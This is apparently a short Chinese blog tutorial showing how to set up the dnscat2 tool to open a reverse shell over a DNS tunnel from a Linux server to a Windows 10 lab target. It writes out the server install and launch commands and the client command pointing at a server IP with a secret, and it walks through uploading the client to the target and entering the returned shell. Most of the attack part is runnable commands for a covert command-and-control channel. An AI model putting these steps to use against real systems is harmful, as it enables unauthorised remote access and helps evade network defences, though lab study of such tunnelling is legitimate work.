使用dnscat2 进行dns隧道反弹shell——直连模式linux对windows

  • 直连模式:客户端直接向指定IP地址的DNS服务器发起DNS解析请求

环境搭建

搭建服务端

git clone https://github.com/iagox86/dnscat2.git

cd dnscat2/server/

gem install bundler

apt-get install ruby-dev

bundle install

过程会有点慢

开启服务端

ruby ./dnscat2.rb

搭建客户端

这里首先需要在Visual Studio 2008中打开一个解决方案:client\win32\dnscat2.vcproj。然后编译就会看到client\win32\Release下有一个dnscat2.exe文件了

将这个文件上传至win10靶机运行

开启客户端

dnscat2.exe --dns server=192.168.227.128,port=53 --secret=9d42a40bfeef7cf1f781326684d4d3e0

剩下的就和linux一样,进入隧道反弹shell,然后ctrl+z返回上一层

进入弹回来的shell

相关推荐
Arvin6271 小时前
Nginx 添加账号密码访问验证
运维·服务器·nginx
王者鳜錸1 小时前
Windows安装OpenClaw龙虾助手
windows·龙虾·自动化脚本执行管家
风曦Kisaki1 小时前
# Linux 磁盘查看命令详解:df 与 du
linux·运维·网络
路溪非溪1 小时前
Linux中gpio子系统的现代接口
linux·arm开发·驱动开发
攻城狮在此1 小时前
华为交换机Console口密码如何清除
运维·网络·华为
内心的一片海2 小时前
服务器内存异常占用
运维·服务器
文静小土豆3 小时前
Centos7负载异常过高排查思路(Load Average)
linux
Deitymoon3 小时前
linux——原子操作
linux
CHICX12293 小时前
2.MySQL 手工注入:从原理到 sqli-labs 实战
web安全·网络安全
大明者省3 小时前
Label Studio安装与启动
windows